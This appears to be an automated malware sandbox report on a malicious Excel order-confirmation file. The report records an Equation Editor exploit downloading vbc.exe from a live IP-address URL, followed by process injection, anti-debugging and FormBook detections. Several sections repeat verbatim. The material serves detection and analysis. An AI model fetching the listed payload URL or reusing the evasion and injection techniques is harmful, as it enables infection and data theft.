Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2956

Thread sleep time: -300000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405EC2 FindFirstFileA,FindClose,	4_2_00405EC2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	4_2_004054EC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402671 FindFirstFileA,	4_2_00402671
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402671 FindFirstFileA,	5_2_00402671
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00405EC2 FindFirstFileA,FindClose,	5_2_00405EC2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	5_2_004054EC

Source: vbc.exe, 00000004.00000002.467502213.00000000004D4000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging:

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 4_2_7306B472 mov eax, dword ptr fs:[00000030h]	4_2_7306B472
Source: C:\Users\Public\vbc.exe	Code function: 4_2_7306B737 mov eax, dword ptr fs:[00000030h]	4_2_7306B737
Source: C:\Users\Public\vbc.exe	Code function: 4_2_7306B776 mov eax, dword ptr fs:[00000030h]	4_2_7306B776
Source: C:\Users\Public\vbc.exe	Code function: 4_2_7306B7B4 mov eax, dword ptr fs:[00000030h]	4_2_7306B7B4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_7306B686 mov eax, dword ptr fs:[00000030h]	4_2_7306B686

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe

Process queried: DebugPort

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 1C0000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior

Source: vbc.exe, 00000005.00000002.673362938.0000000000900000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.673362938.0000000000900000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000005.00000002.673362938.0000000000900000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

4_2_0040312A

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match

File source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match

File source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.94.159.204	unknown	United States		36352	AS-COLOCROSSINGUS	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://23.94.159.204/poc/vbc.exe	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown

AV Detection:

Multi AV Scanner detection for submitted file

Source: ORDERCONFIRMATION_00001679918.xlsx	Virustotal: Detection: 30%			Perma Link
Source: ORDERCONFIRMATION_00001679918.xlsx	ReversingLabs: Detection: 28%

Yara detected FormBook

Source: Yara match

File source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://23.94.159.204/poc/vbc.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://23.94.159.204/poc/vbc.exe

Virustotal: Detection: 11%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Virustotal: Detection: 42%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll	Virustotal: Detection: 15%	Perma Link
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 42%	Perma Link
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 20%

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 4.2.vbc.exe.2770000.4.unpack	Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.1c0000.1.unpack	Avira: Label: W32/Delf.I
Source: 5.2.vbc.exe.1c0000.0.unpack	Avira: Label: TR/ATRAPS.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: wntdll.pdb source: vbc.exe, 00000004.00000003.465849366.000000000E750000.00000004.00000001.sdmp

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405EC2 FindFirstFileA,FindClose,	4_2_00405EC2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	4_2_004054EC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402671 FindFirstFileA,	4_2_00402671
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402671 FindFirstFileA,	5_2_00402671
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00405EC2 FindFirstFileA,FindClose,	5_2_00405EC2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	5_2_004054EC

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 23.94.159.204:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 23.94.159.204:80

Networking:

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Downloads executable code via HTTP

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204
Source: unknown	TCP traffic detected without corresponding DNS query: 23.94.159.204

Source: vbc.exe, vbc.exe, 00000005.00000000.466883914.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.466883914.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.467563721.0000000001CD0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.467563721.0000000001CD0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: F76D3143.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F76D3143.emf

Jump to behavior

Source: global traffic

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

4_2_00404FF1

E-Banking Fraud:

Yara detected FormBook

Source: Yara match

File source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Yara signature match

Source: 5.0.vbc.exe.1c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 4.2.vbc.exe.2770000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 4.2.vbc.exe.2770000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.1c0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.2.vbc.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000000.466845988.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000004.00000002.469258298.0000000002770000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		4_2_0040312A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		5_2_0040312A

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406354	4_2_00406354
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00404802	4_2_00404802
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406B2B	4_2_00406B2B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_73067500	4_2_73067500
Source: C:\Users\Public\vbc.exe	Code function: 4_2_7306BA78	4_2_7306BA78
Source: C:\Users\Public\vbc.exe	Code function: 4_2_7306BA87	4_2_7306BA87
Source: C:\Users\Public\vbc.exe	Code function: 4_2_7306754F	4_2_7306754F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00406354	5_2_00406354
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00404802	5_2_00404802
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00406B2B	5_2_00406B2B

Found potential string decryption / allocating functions

Source: C:\Users\Public\vbc.exe

Code function: String function: 00402A29 appears 51 times

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe

Code function: 4_2_7306BF13 CreateProcessW,NtQueryInformationProcess,VirtualAllocEx,CreateRemoteThread,SuspendThread,

4_2_7306BF13

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: ORDERCONFIRMATION_00001679918.xlsx	Virustotal: Detection: 30%
Source: ORDERCONFIRMATION_00001679918.xlsx	ReversingLabs: Detection: 28%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$ORDERCONFIRMATION_00001679918.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE2EE.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@6/16@0/1

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00402053 CoCreateInstance,MultiByteToWideChar,

4_2_00402053

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

4_2_004042C1

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: wntdll.pdb source: vbc.exe, 00000004.00000003.465849366.000000000E750000.00000004.00000001.sdmp

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2956

Thread sleep time: -300000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405EC2 FindFirstFileA,FindClose,	4_2_00405EC2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	4_2_004054EC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402671 FindFirstFileA,	4_2_00402671
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402671 FindFirstFileA,	5_2_00402671
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00405EC2 FindFirstFileA,FindClose,	5_2_00405EC2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	5_2_004054EC

Source: vbc.exe, 00000004.00000002.467502213.00000000004D4000.00000004.00000020.sdmp

Anti Debugging:

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 4_2_7306B472 mov eax, dword ptr fs:[00000030h]	4_2_7306B472
Source: C:\Users\Public\vbc.exe	Code function: 4_2_7306B737 mov eax, dword ptr fs:[00000030h]	4_2_7306B737
Source: C:\Users\Public\vbc.exe	Code function: 4_2_7306B776 mov eax, dword ptr fs:[00000030h]	4_2_7306B776
